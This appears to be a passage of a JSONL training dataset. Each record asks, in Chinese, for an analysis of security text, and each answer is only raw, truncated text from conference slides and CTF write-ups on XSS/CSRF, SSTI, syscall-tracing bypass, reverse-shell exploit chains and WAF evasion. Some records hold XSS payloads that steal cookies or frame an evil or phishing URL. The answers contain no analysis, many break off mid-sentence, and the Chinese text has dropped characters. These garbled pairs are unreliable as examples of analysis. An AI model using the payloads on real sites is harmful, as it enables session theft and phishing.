Camera Custom chip ly.tl/poker RF Bluetooth antenna LEDS ly.tl/poker Card marking How does this thing work anyway?? Cards marking Casino Royale ly.tl/poker ly.tl/poker ly.tl/poker ly.tl/poker Marked cards vs regular cards Marked cards Regular cards Device camera view ly.tl/poker Card encoding ly.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrace Me If You can: Bypassing Linux SyscallTracing Dr. Rex Guo, Lacework Dr. Junyuan Zeng, Linkedin.com #BHUSA @BlackHatEvents About Rex Guo  Principal Engineer @ Lacework  Behavior anomaly detection (Polygraph)  CSPM  Engineering Manager @ Startups  Confluera (XDR)  Tetration (CWPP, now part of Cisco)  Conference speaker at Blackhat, DEFCON,  @Xiaofei_REX About Junyuan Zeng  Linkedin  Senior Software Engineer: Kubernetes  JD.com  Staff Security Architect/Engineer: Cloud native security  Samsung Research America & FireEye  Staff Security Software Engineer/Researcher: Mobile security An Incident - An Attackers View Log4shell RCE on joe-box and executed a reverse shell An Incident - An Attackers View Log4shell RCE on joe-box and executed a reverse shell Privilege escalation using sudo CVE-2021-3156 An Incident - An Attackers View Log4shell RCE on joe-box and executed a reverse shell read /etc/shadow Privilege escalation using sudo CVE-2021-3156 An Incident - An Attackers View Log4shell RCE on joe-box and executed a reverse shell read /etc/shadow Read ssh process environment variable Privilege escalation using sudo CVE-2021-3156 An Incident - An Attackers View Log4shell RCE on joe-box and executed a reverse shell read /etc/shadow Read ssh process environment variable Lateral movement to alice-box with ssh hijacking Privilege escalation using sudo CVE-2021-3156 An Incident - An Attackers View Log4shell RCE on joe-box and executed a reverse shell read /etc/shadow Read ssh process environment variable Lateral movement to alice-box with ssh hijacking Privilege escalation using sudo CVE-2021-3156 An Incident - An Attackers View Log4shell RCE on joe-box and executed a reverse shell Privilege escalation using sudo CVE-2021-3156 read /etc/shadow Read ssh process environment variable Lateral movement to alice-box with ssh hijacking connect etc. execve(at) open(at) open(at) connect, etc. Incident Response Detection Rule Example rule: untrusted program reads /etc/shadow conditio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python def supa_encryption(s1, s2): res = [chr(0)]*24 for i in range(len(res)): q = ord(s1[i]) d = ord(s2[i]) k = q  d res[i] = chr(k) res = ''.join(res) return res def add_pad(msg): L = 24 - len(msg)%24 msg += chr(L)*L return msg with open('fullhd.png','rb') as f: data = f.read() data = add_pad(data) with open('key.txt') as f: key = f.read() enc_data = '' for i in range(0, len(data), 24): enc = supa_encryption(data[i:i+24], key) enc_data += enc with open('BITSCTFfullhd.png', 'wb') as f: f.write(enc_data)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNetRipper SMART TRAFFIC SNIFFING FOR PENETRATION TESTERS Ionut Popescu  Senior Security Consultant @ KPMG Romania Who am I?  Ionut Popescu  Senior Security Consultant @ KPMG Romania  Blogger @ securitycafe.ro  Administrator @ rstforums.com Romania 1. Introduction 2. When it is useful 3. How it works 4. Reflective DLL Injection 5. API Hooking 6. Hooking Google Chrome 7. Questions? Agenda Introduction NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. When it is useful Internal penetration test Pentester User User Sysadmin How it works - Example Outlook Hi, The new password is Defcon23. Thanks! Encryption layer  encrypted data (   encrypted data NetRipper User Network How it works - Example Outlook Hi, The new password is Defcon23. Thanks! Encryption layer  encrypted data (   encrypted data ncrypt.dll (SslEncryptPacket) User ws2_32.dll (send/WSASend) How it works - Example Outlook Hi, The new password is Defcon23. Thanks! Encryption layer  encrypted data (   encrypted data ncrypt.dll (SslEncryptPacket) User ws2_32.dll (send/WSASend) NetRipper.dll (Hook) Implementation details Data extraction Unencrypted data is saved locally API Hooking Specific functions are intercepted Reflective DLL Injection The DLL is injected into target processes Classic DLL Injection Disadvantages: DLL must be written on disk DLL is listed in the process modules How it works: 1. Open the remote process 2. Write DLL full path location in process memory 3. Call LoadLibrary() to load the DLL Reflective DLL Injection Stephen Fewer [Harmony Security] How it works: 1. DLL contents are copied from memory to target process memory 2. An exported function is called ( ReflectiveLoader() ) 3. The function correctly loads the DLL into memory Advantages: DLL does not touch", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前段时间补上了迟迟没有写的 件包含漏洞原理与实际案例介绍在其中就提到了 Thymeleaf SSTI 漏洞昨天在赛博群三梦师傅扔了个随挖的 CVEThymeleaf SSTI Bypass想着之前项的代码还没清理起分析来看看 Thymeleaf 是与 java 配合使的款服务端模板引擎也是 Spring 官持的款服务端模板 引擎 SSTI 最初是由 James Kettle 提出研究后来 Emilio Pinna 对他的研究进了补充然 这些作者都没有对 Thymeleaf 进 SSTI 漏洞挖掘因此后来 Aleksei Tiurin 在 ACUNETIX 的官博客上发表了关于 Thymeleaf SSTI 的章 为了更便读者理解这个 Bypass因此在这赘述遍些基础性的内容了解的可以直接跳到 0x03 的内容 Thymeleaf 表达式可以有以下类型 ${...} 变量表达式  通常在实际应般是OGNL表达式或者是 Spring EL如果 集成了Spring的话可以在上下变量context variables 中执 *{...} : 选择表达式  类似于变量表达式区别在于选择表达式是在当前选择的对象 不是整个上下变量映射上执 #{...} : Message (i18n) 表达式  允许从外部源如 .properties 件检索特定 于语环境的消息 @{...} : 链接 (URL) 表达式  般在应程序中设置正确的 URL/路径URL重 写 ~{...} 段表达式  Thymeleaf 3.x 版本新增的内容分段段表达式是种表示标 记段并将其移动到模板周围的简单法 正是由于这些表达式段可以被复制或者作 为参数传递给其他模板等等 实际上Thymeleaf 出现 SSTI 问题的主要原因也正是因为这个段表达式我们知道段表达式 语法如下 1. ~{templatename::selector} 会在 /WEB-INF/templates/ 录下寻找名为 templatename 的模版中定义的 fragment 如有个 html 件的代码如下 001 写在前 002 Thymeleaf SSTI 然后在另template中可以通过段表达式引该段 th:insert 和 th:replace: 插段是较常的法 2. ~{templatename} 引整个 templatename 模版件作为 fragment 这个也较好理解不做详细举例 3. ~{::selector} 或 ~{this::selector} 引来同模版件名为 selector 的 fragmnt 在这 selector 可以是通过 th:fragment 定义的段也可以是类选择器ID选择器等 4. 当 ~{} 段表达式中出现 :: 那么 :: 后需要有值也就是 selector  在了解这些内容后我们就可以正式来看这个漏洞是怎么回事了 先同样的我们拿个常的例 这是 SpringBoot 项中某个控制器的部分代码段thymeleaf 的录如下 <!DOCTYPE html> <html th=\"http://www.thymeleaf.org\"> <body> <div fragment=\"banquan\"> &copy; 2021 ThreeDream yyds</div> </body> </html> HTML xmlns: th: <div insert=\"~{footer :: banquan}\"></div> HTML th: @GetMapping(\"/admin\") public String path(@RequestParam String language) { return \"language/\" + language + \"/admin\"; } JAVA 从代码逻辑中基本上可以判断这实际上是个语界选择的功能如果是中阅读习惯者那 么会令 language 参数为 cn 如果是英阅读习惯者那么会令 language 参数为 en 代码逻辑 本身实际上是没有什么问题的但是这采的是 thymeleaf 模板就出现了问题 在springboot + thymeleaf 中如果视图名可控就会导致漏洞的产其主要原因就是在控制 器中执 return 后Spring 会动调度 Thymeleaf 引擎寻找并渲染模板在寻找的过程中会 将传的参数当成SpEL表达式执从导致了远程代码执漏洞 thymeleaf 渲染的流程如下 createView() 根据视图名创建对应的View renderFragment() 根据视图名解析模板名称 所以可以跟进 renderFragment() 来看看如何解析模板名称的 核代码我复制了出来 protected void re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDouglas McKee Mark Bereza                 DEBUG THIS, NERD Watchdog error message Binary Patch                             What do we have?  Execution control via GOT override  Netcat installed by def  Memory on heap What do we want?  Persistence  Root access How do we get it (easily)?  Put shellcode in memory we control  Fire off reverse shell by calling system() What do we have?  Execution control via GOT overwrite  Netcat installed by default  Memory on heap What do we want?  Persistence  Root access How do we get it (easily)?  Put shellcode in memory we control  Fire off reverse shell by calling system() What do we have?  Execution control via GOT overwrite  Netcat installed by default  Memory on heap What do we want?  Persistence  Root access How do we get it (easily)?  Put shellcode in memory we control  Fire off reverse shell by calling system() What do we have?  Execution control via GOT overwrite  Netcat installed by default  Memory on heap What do we want?  Root access  Persistence How do we get it (easily)?  Put shellcode in memory we control  Fire off reverse shell by calling system() What do we have?  Execution control via GOT overwrite  Netcat installed by default  Memory on heap What do we want?  Root access  Persistence How do we get it (easily)?  Put shellcode in memory we control  Fire off reverse shell by calling system() What do we have?  Execution control via GOT overwrite  Netcat installed by default  Memory on heap What do we want?  Root access  Persistence How do we get it (easily)?  Put shellcode in memory we control  Fire off reverse shell by calling system()                     R4 + offset gets us close to system() address Hit when relay turns on Call to ioctl() flips relay             Inserted into startup script using our exploit 1. Delta programming executes 2. Dynamic linker loads objects in the following order: 1. Delta programming executes 2. Dynamic linker loads objects in the following order: 3. I/O polling thread calls canioWriteO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYou Can You Cant See Me t See Me  看不見的網站攻擊 看不見的網站攻擊 Unohope / Trueman PDF created with pdfFactory Pro trial version www.pdffactory.com 講者簡介 講者簡介 u Trueman u http://roamer.cc u 網駭科技技術顧問曾任職於入口網站 金融業資安原廠與專業資安服務廠商 專長於網路滲透測試駭客攻擊手法研 究並曾擔任多場資安研討與發表會主講 人 PDF created with pdfFactory Pro trial version www.pdffactory.com 看不見的網站攻擊手法 看不見的網站攻擊手法 u 網站管理者在面對網站攻擊時的反應通常 總是慢半拍往往等到網站淪陷了才有 所警覺 u 有許多的間接式網站攻擊手法是管理者所 難以偵測的在這種情況下網站管理者 該如何保障網站使用者的安全呢 PDF created with pdfFactory Pro trial version www.pdffactory.com 近期常見間接式網站攻擊手法 近期常見間接式網站攻擊手法 u XSS u CSRF u Redirect u 信任網站 u And PDF created with pdfFactory Pro trial version www.pdffactory.com xss xss u Cross Site Scripting u 跨站腳本攻擊 u 輸入值驗證錯誤Input Validation Error的安全弱點 u 攻擊對象非網站本身 u 你出包我倒楣他真爽 PDF created with pdfFactory Pro trial version www.pdffactory.com Cross Cross--Site Scripting Site Scripting u 在 Web 應用程式中當 參數 或 資料 顯示成 HTML 網頁前未檢查內容是否含 HTML tag 或 網頁腳本導致被駭客利用攻擊其他瀏覽網站 的無辜使用者 u 簡單的攻擊例子  http://www.victim.com/function.cgi?data=<scr ipt>alert(\"XSS!\")</script>  http://www.victim.com/function.cgi?data=<ifr ame src=\"<evilURL>\"></iframe> PDF created with pdfFactory Pro trial version www.pdffactory.com 常見利用 常見利用 u 竊取cookie等機敏資訊  <script>alert(document.cookie)</script> u 掛馬  <iframe src=惡意連結位址></iframe> u 網路釣魚  <iframe src=釣魚網站位址></iframe> PDF created with pdfFactory Pro trial version www.pdffactory.com 常見散播管道 常見散播管道 u 廣告信 u 論壇發文 u 縮網址 u 關鍵字與網頁看板廣告 u etc PDF created with pdfFactory Pro trial version www.pdffactory.com Cross Cross--Site Request Forgery Site Request Forgery u 簡稱CSRF或XSRF u 廣義XSS的一種 u 針對登入後的網站執行操作 PDF created with pdfFactory Pro trial version www.pdffactory.com Alice Alice轉帳 轉帳100 100元給 元給Bob Bob時 時 u u POST http://bank.com/transfer.do HTTP/1.1 POST http://bank.com/transfer.do HTTP/1.1 u u . . . . . . u u . . . . . . u u . . . . . . u u Content Content--Length: 19; Length: 19; u u user=BOB&money=100 user=BOB&money=100 PDF created with pdfFactory Pro trial version www.pdffactory.com 惡意使用者 惡意使用者Maria Maria u 而另一位惡意的使用者Maria留意到在轉帳的過程中網頁 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhostnamectl === 查询或更改系统主机名 ## 补充说明 hostnamectl可用于查询和更改系统主机名和相关设置 ### 语法 ```bash hostnamectl [选项...] 指令 ... ``` ### 指令 ```bash status 显示当前主机名设置 set-hostname NAME 设置系统主机名 set-icon-name NAME 设置主机的图标名称 set-chassis NAME 设置主机的机箱类型 set-deployment NAME 设置主机的部署环境 set-location NAME 设置主机位置 ``` ### 选项 ```bash -h --help 显示此帮助 --version 显示包的版本 --no-ask-password 不提示输入密码 -H --host=[USER@]HOST 在远程主机上操作 -M --machine=CONTAINER 在本地容器上执行操作指定要连接到的容器名称 --transient, --static, --pretty 如果调用了status或者没有给出显式命令并且指定了其中一个开关hostnamectl将只打印出这个选定的主机名 ``` ### 实例 显示主机名设置 ```bash $ hostnamectl status ``` 改变主机名(永久修改,不用重启哦~) ```bash $ sudo hostnamectl set-hostname newname ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLegal Aspects of Full Spectrum Computer Network (Active) Defense def con 2013 Agenda Disclaimer Errata Self Defense in Physical World Applying Self Defense to Computer Network Defense Technology Pen Testing/Red Teaming Intelligence/Open Source IA and Training/Polices Information Control Active Defense Deception Operating on The Net Agenda I have an active defense scenario. Disclaimer Disclaimer - aka the fine print Joint Ethics Regulation Views are those of the speaker Im here in personal capacity Dont represent view of government Disclaimer required at beginning of presentation. All material - unclassified U.S. Law And Computer Network Operations 1 Office of Cybersecurity & Communications Future Strategy November 9, 2009 Oh yeah, 1986 CFAA Definition of Special Skills Special skill  a skill not possessed by members of the general public and usually requiring substantial education, training or licensing. Examples  pilots, lawyers, doctors, accountants, chemists and demolition experts. Not necessary to have formal education or training Skills can be acquired through experience or self-tutelage. Critical question is whether the skill set elevates to a level of knowledge and proficiency that eclipses that possessed by the general public. United States v. Prochner, 417 F3d. 54 (D. Mass. July 22, 2005) In re Innovatio IP Ventures, LLC Patent Litigation, - - - - F.Supp.2d - - - , 2013 WL 427167 (N.D. Ill. Feb. 4, 2013) Patent Owners of wireless Internet technology Sue commercial users of wireless Internet technology Alleging by making wireless Internet available to customers or using it to manage internal processes, users infringed various claims of 17 patents. Plaintiff Innovatio has sued numerous hotels, coffee shops, restaurants, supermarkets, and other commercial users of wireless internet technology located throughout the United States (collectively, the Wireless Network Users). In re Innovatio IP Ventures, LLC Patent Litigation & ECPA In re Innovatio IP Ventures, LL", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Command line swithes IDA can be launched with one of the following command lines: - idaq input-file (All platforms: start graphical interface) - idaw input-file (Windows: start text interface) - idal input-file (Linux/Mac: start text interface) Add the '64' postfix to the command name in order to start the 64-bit version of IDA. For example: ```idaq64 input-file``` will start 64-bit graphical interface. The following command line switches are recognized: ``` -a disable auto analysis -A autonomous mode. IDA will not display dialog boxes. Designed to be used together with -S switch. -b#### loading address, a hexadecimal number, in paragraphs (a paragraph is 16 bytes) -B batch mode. IDA will generate .IDB and .ASM files automatically -c disassemble a new file (delete the old database) -ddirective A configuration directive which must be processed at the first pass. Example: -dVPAGESIZE=8192 -Ddirective A configuration directive which must be processed at the second pass. -f disable FPP instructions (IBM PC only) -h help screen -i#### program entry point (hex) -I# set IDA as just-in-time debugger (0 to disable and 1 to enable) -L#### name of the log file -M disable mouse (text only) -O#### options to pass to plugins -o#### specify the output database (implies -c) -p#### processor type -P+ compress database (create zipped idb) -P pack database (create unzipped idb) -P- do not pack database (not recommaned, see Abort command) -r### immediately run the built-in debugger format of this switch is explained here -R load MS Windows exe file resources -S### Execute a script file when the database is opened. The script file extension is used to determine which extlang will run the script. It is possible to pass command line arguments after the script name. For example: -S\"myscript.idc argument1 \\\"argument 2\\\" argument3\" The passed parameters are stored in the \"ARGV\" global IDC variable. Use \"ARGV.count\" to determine the number of arguments. The first argument \"ARGV[0]\" contain", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#include <cstdio> #include <vector> #include <map> #include <set> #include <cassert> #include <algorithm> #define N 8 #define LEN 4 //#define X 0 //#define Y 20 int X, Y; enum type { ADD, ROL, XOR, }; struct operation { type t; unsigned char arg; }; struct four { operation ops[LEN]; }; std::vector<four> generate_sequences(int n) { if (n == 0) { return {{}}; } auto prev = generate_sequences(n - 1); int cnt = 0; for (auto& seq: prev) { //type tx[] = {ADD, ROL, XOR, ADD}; //type t = tx[n-1]; for (auto t: {ADD, ROL, XOR}) { if (n > 1 && seq.ops[n-2].t == t) continue; if (n == 1 && t != ADD) continue; if (n == 2 && t != ROL) continue; if (n == 3 && t != XOR) continue; if (n == 4 && t != ADD) continue; for (int arg = 0; arg < (1<<N); arg++) { if (t == ROL && arg == N) break; if (t == ROL && arg == 0) continue; cnt++; } } } std::vector<four> ret; ret.reserve(cnt); for (auto& seq: prev) { //type tx[] = {ADD, ROL, XOR, ADD}; //type t = tx[n-1]; for (auto t: {ADD, ROL, XOR}) { if (n > 1 && seq.ops[n-2].t == t) continue; if (n == 1 && t != ADD) continue; if (n == 2 && t != ROL) continue; if (n == 3 && t != XOR) continue; if (n == 4 && t != ADD) continue; for (int arg = 0; arg < (1<<N); arg++) { if (t == ROL && arg == N) break; if (t == ROL && arg == 0) continue; ret.push_back(seq); ret.back().ops[n-1] = {t, (unsigned char)arg}; } } } return ret; } void print_seq(const four& ops) { printf(\"[\"); for (auto op: ops.ops) { //printf(\"%s %d\\n\", (op.t == ADD ? \"ADD\" : op.t == ROL ? \"ROL\" : \"XOR\"), op.arg); printf(\"(%d, %d), \", op.t, op.arg); } printf(\"],\\n\"); } int apply(int n, const four& ops) { for (auto op: ops.ops) { if (op.t == ADD) { n += op.arg; } if (op.t == ROL) { n = (n << op.arg) | (n >> (N - op.arg)); } if (op.t == XOR) { n = op.arg; } n &= (1<<N) - 1; } return n; } bool correct(const four& ops) { if (apply(0, ops) != Y || apply(Y, ops) != 0) return false; for (int i = 1; i < (1<<N); i++) { if (i == Y) continue; if (apply(i, ops) != i) return false; } return true; } bool c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Remote Metamorphic Engine Detecting, Evading, Attacking the AI and Reverse Engineering Amro Abdelgawad / DEFCON 24 line46_1: mov ecx, [esp] nop nop mov dl, 0xe9 test edx, edx mov byte [ecx], dl xor eax, 0 mov edx, 0x00000067 mov dword [ecx+1], edx ret line95: pushad pushf call line95_1 db 7 db 3 dd 838225172 db 2 dd 4211932376 db 4 dd 2520091426 db 3 dd 946381070 db 2 dd 3318121790 db 2 dd 1375432265 db 1 dd -1 mov ebx, 92 add eax, ebx mov ebx, eax sub dword [eax], 0xe82c334d add eax, 4 add dword [eax], 0xa1723594 add eax, 4 xor dword [eax], 0xb1c21343 add eax, 4 sub dword [eax], 0x111111ee add eax, 4 add dword [eax], 0xaaccee22 add eax, 4 jmp ebx line95_2: popf popad nop jmp long line96 line95_1: mov eax, [esp] nop nop xor eax, eax xor ecx, ecx xor edx, edx mov cl, 0xe9 mov byte [eax], cl xor edx, 0 mov ecx, 0x00000057 mov dword [eax+1], ecx ret The Remote Metamorphic Engine  Security as undefined expression  Flux binary mutation  Resisting Reverse Engineering  Evading AI machine learning  Artificial Immunity line46_1: mov ecx, [esp] nop nop mov dl, 0xe9 test edx, edx mov byte [ecx], dl xor eax, 0 mov edx, 0x00000067 mov dword [ecx+1], edx ret line95: pushad pushf call line95_1 db 7 db 3 dd 838225172 db 2 dd 4211932376 db 4 dd 2520091426 db 3 dd 946381070 db 2 dd 3318121790 db 2 dd 1375432265 db 1 dd -1 mov ebx, 92 add eax, ebx mov ebx, eax sub dword [eax], 0xe82c334d add eax, 4 add dword [eax], 0xa1723594 add eax, 4 xor dword [eax], 0xb1c21343 add eax, 4 sub dword [eax], 0x111111ee add eax, 4 add dword [eax], 0xaaccee22 add eax, 4 jmp ebx line95_2: popf popad nop jmp long line96 line95_1: mov eax, [esp] nop nop xor eax, eax xor ecx, ecx xor edx, edx mov cl, 0xe9 mov byte [eax], cl xor edx, 0 mov ecx, 0x00000057 mov dword [eax+1], ecx ret Security Patterns {Division by Zero | Division by Infinity } Isolation Randomization line46_1: mov ecx, [esp] nop nop mov dl, 0xe9 test edx, edx mov byte [ecx], dl xor eax, 0 mov edx, 0x00000067 mov dword [ecx+1], edx ret line", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho am I and what am I doing?  Airscanner.com  Mobile Security (AV, firewall, sniffer)  Dissemination of Information  Reverse-engineering is a toolnot a weapon  Knowing your computer  Dont stealpay the programmers Legal Issues  Laws No person shall circumvent a technological measure that effectively controls access to a work protected under this title. to ''circumvent a technological measure'' means to descramble a scrambled work, to decrypt an encrypted work, or otherwise to avoid, bypass, remove, deactivate, or impair a technological measure, without the authority of the copyright owner;  Encryption Research & Security Testing identify and analyze flaws and vulnerabilities of encryption technologies applied to copyrighted works accessing a computer systemsolely for the purpose of investigating a security flaw or vulnerability Windows CE Architecture  Processors  Power&Processing = Heat  Reduced Instruction Set Computer (RISC)  ARM (1987): StrongARM, Xscale  WinCE, ARM Linux, EPOC  Intel bought DEC (StrongARM)  Larger Cache  Dynamic Voltage  StrongARM 2.5 million transistors / Xscale 5 million  Lower power usage at higher speed Architecture Cont.  Kernel/Process  Kernel  Reduced Windows 2000 (No 16 bit or MS-DOS)  Core DLL issues  DLLs are run from ROM  Cant break a program when its executing DLL code  Processes (32) with dedicated 32MB/Process  512x64k memory blocks, 16 registers per thread  Kernel (OS) & User (3rd party programs) Mode  Processes are isolated but threads share data Architecture Cont.  Memory  Memory  RAM (Program & Objects)  Lose power - lose programs and objects (files)  ROM  Store OS files  Compression  eXecute In Place  Save memory (No Compression)  Object Store (Files)  Registry: Configuration settings  Programs: Compressed area for 3rd party programs  Databases: Structured storage Architecture Cont.  GWES/Scheduler  Graphics, Windowing and Event Subsystem  Handles all messaging  Your friend (Popups)  PostMessage, SendMessage, SendThreadMessag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# asm3 Reverse Engineering, 300 points ## Description: > What does asm3(0xfe8cf7a4,0xf55018af,0xb8c70926) return? ```assembly asm3: <+0>: push ebp <+1>: mov ebp,esp <+3>: xor eax,eax <+5>: mov ah,BYTE PTR [ebp+0x9] <+8>: shl ax,0x10 <+12>: sub al,BYTE PTR [ebp+0xd] <+15>: add ah,BYTE PTR [ebp+0xe] <+18>: xor ax,WORD PTR [ebp+0x12] <+22>: nop <+23>: pop ebp <+24>: ret ``` ## Solution: Since this is a bit more complicated to analyze by hand, we can run it and inspect the result. ### Option #1: Using an Emulator We can use [this](https://carlosrafaelgn.com.br/asm86/) online emulator to run the code, we just need to clean it up a bit and setup the stack: ```assembly start: push 0xb8c70926 push 0xf55018af push 0xfe8cf7a4 call asm3 asm3: push ebp mov ebp,esp xor eax,eax mov ah,BYTE PTR [ebp+0x9] shl ax,0x10 sub al,BYTE PTR [ebp+0xd] add ah,BYTE PTR [ebp+0xe] xor ax,WORD PTR [ebp+0x12] nop pop ebp ret ``` Using a breakpoint on the `ret` instruction, we see that the value is `0xe82f`. ### Option #2: Compiling the Code Contents of `test.S`: ```assembly .intel_syntax noprefix .global asm3 asm3: push ebp mov ebp,esp xor eax,eax mov ah,BYTE PTR [ebp+0x9] shl ax,0x10 sub al,BYTE PTR [ebp+0xd] add ah,BYTE PTR [ebp+0xe] xor ax,WORD PTR [ebp+0x12] nop pop ebp ret ``` Contents of `main.c`: ```assembly #include <stdio.h> int asm3(int, int, int); int main(int argc, char* argv[]) { printf(\"0x%x\\n\", asm3(0xfe8cf7a4,0xf55018af,0xb8c70926)); return 0; } ``` Compiling and running: ```console root@kali:/media/sf_CTFs/pico/asm3/out# gcc -masm=intel -m32 -c test.S -o test.o root@kali:/media/sf_CTFs/pico/asm3/out# gcc -m32 -c main.c -o main.o root@kali:/media/sf_CTFs/pico/asm3/out# gcc -m32 test.o main.o -o main root@kali:/media/sf_CTFs/pico/asm3/out# ./main 0xe82f ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRWCTF Nu1L forensics ccls-fringe { \"last_write_time\":1532281822000000000, \"language\":2, \"lid2path\":[ ], \"import_file\":\"/home/flag/fringe.cc\", \"args\":[ \"%clang\", \"/home/flag/fringe.cc\" ], \"dependencies\":[ \"/usr/include/c++/8.1.1/ext/atomicity.h\", \"/usr/include/asm-generic/errno.h\", \"/usr/include/bits/types/__FILE.h\", \"/usr/include/c++/8.1.1/system_error\", \"/usr/include/errno.h\", \"/usr/include/sys/ucontext.h\", \"/usr/include/c++/8.1.1/bits/stl_pair.h\", \"/usr/include/sys/select.h\", \"/usr/include/c++/8.1.1/cwchar\", \"/usr/include/c++/8.1.1/type_traits\", \"/usr/include/bits/locale.h\", \"/usr/include/bits/libio.h\", \"/usr/include/c++/8.1.1/debug/assertions.h\", \"/usr/include/bits/setjmp.h\", \"/usr/include/c++/8.1.1/bits/stl_bvector.h\", \"/usr/include/c++/8.1.1/bits/hash_bytes.h\", \"/usr/include/bits/types/timer_t.h\", \"/usr/include/c++/8.1.1/bits/exception_defines.h\", \"/usr/include/bits/_G_config.h\", \"/usr/include/c++/8.1.1/x86_64-pc-linux-gnu/bits/os_defines.h\", \"/usr/include/bits/thread-shared-types.h\", \"/usr/include/c++/8.1.1/backward/binders.h\", \"/usr/include/c++/8.1.1/iosfwd\", \"/usr/include/bits/types/struct_timespec.h\", \"/usr/include/c++/8.1.1/x86_64-pc-linux-gnu/bits/ctype_inline.h\", \"/usr/include/c++/8.1.1/x86_64-pc-linux-gnu/bits/gthr-default.h\", \"/usr/include/pthread.h\", \"/usr/include/c++/8.1.1/bits/cpp_type_traits.h\", \"/usr/include/c++/8.1.1/bits/streambuf.tcc\", \"/usr/include/bits/libc-header-start.h\", \"/usr/include/c++/8.1.1/string\", \"/usr/include/c++/8.1.1/bits/cxxabi_init_exception.h\", \"/usr/include/bits/typesizes.h\", \"/usr/include/c++/8.1.1/ostream\", \"/usr/include/c++/8.1.1/bits/vector.tcc\", \"/usr/include/sys/cdefs.h\", \"/usr/include/c++/8.1.1/bits/istream.tcc\", \"/usr/include/c++/8.1.1/initializer_list\", \"/usr/include/c++/8.1.1/ext/new_allocator.h\", \"/usr/include/bits/wordsize.h\", \"/usr/include/c++/8.1.1/bits/stl_uninitialized.h\", \"/usr/include/c++/8.1.1/x86_64-pc-linux-gnu/bits/c++allocator.h\", \"/usr/include/bits/types/struct_timeval.h\", \"/usr/include/bits/cpu-set.h\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 php件上传处理流程简单分析-php在流量层 绕waf的姿势 boundary值处理 body处理 filename的特殊处理 作者:帽酱 php件上传处理在 main/rfc1867.c 中的 rfc1867_post_handler函数 测试环境 PHP 7.1.9 boundary值处理 2 SAPI_API SAPI_POST_HANDLER_FUNC(rfc1867_post_handler) C 复制代码 if (SG(post_max_size) > 0 && SG(request_info).content_length > SG(post_max_size)) { sapi_module.sapi_error(E_WARNING, \"POST Content-Length of \" ZEND_LONG_FMT \" bytes exceeds the limit of \" ZEND_LONG_FMT \" bytes\", SG(request_info).content_length, SG(post_max_size)); return; } /* Get the boundary */ boundary = strstr(content_type_dup, \"boundary\");//查找是否包含boundary if (!boundary) { int content_type_len = (int)strlen(content_type_dup); char *content_type_lcase = estrndup(content_type_dup, content_type_len); php_strtolower(content_type_lcase, content_type_len); boundary = strstr(content_type_lcase, \"boundary\"); if (boundary) { boundary = content_type_dup + (boundary - content_type_lcase); } efree(content_type_lcase); } if (!boundary || !(boundary = strchr(boundary, '='))) {//判断boundary值起始 位置 sapi_module.sapi_error(E_WARNING, \"Missing boundary in multipart/form-data POST data\"); return;//传畸形的boundary会抛出警告 (可以来检测标php是否开启错误回显) } boundary++; boundary_len = (int)strlen(boundary); if (boundary[0] == '\"') {//引号包裹 boundary++; boundary_end = strchr(boundary, '\"'); if (!boundary_end) { sapi_module.sapi_error(E_WARNING, \"Invalid boundary in multipart/form-data POST data\"); return; } } else {//引号包裹 /* search for the end of the boundary */ boundary_end = strpbrk(boundary, \",;\");//截字符 } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 3 先php先从Content-Type是否包含boundary字符串 之后寻找等号的位置作为起始位置获取boundary值 boundary的值有引号包裹和引号包裹两种情况 在引号包裹时可以使逗号或分号作为终字符 到这就可以总结出有效boundary格式了 {任意字符}boundary{除等号外任意字符}=[\"]{boundary内容}[\"][[,;]{任意字符}] if (boundary_end) { boundary_end[0] = '\\0'; boundary_len = boundary_end-boundary; } /* Initialize the buffer */ if (!(mbuff = multipart_buffer_new(boundary, boundary_len))) { sapi_module.sapi_error(E_WARNING,", "category": "text_analysis", "source": "security_papers"}
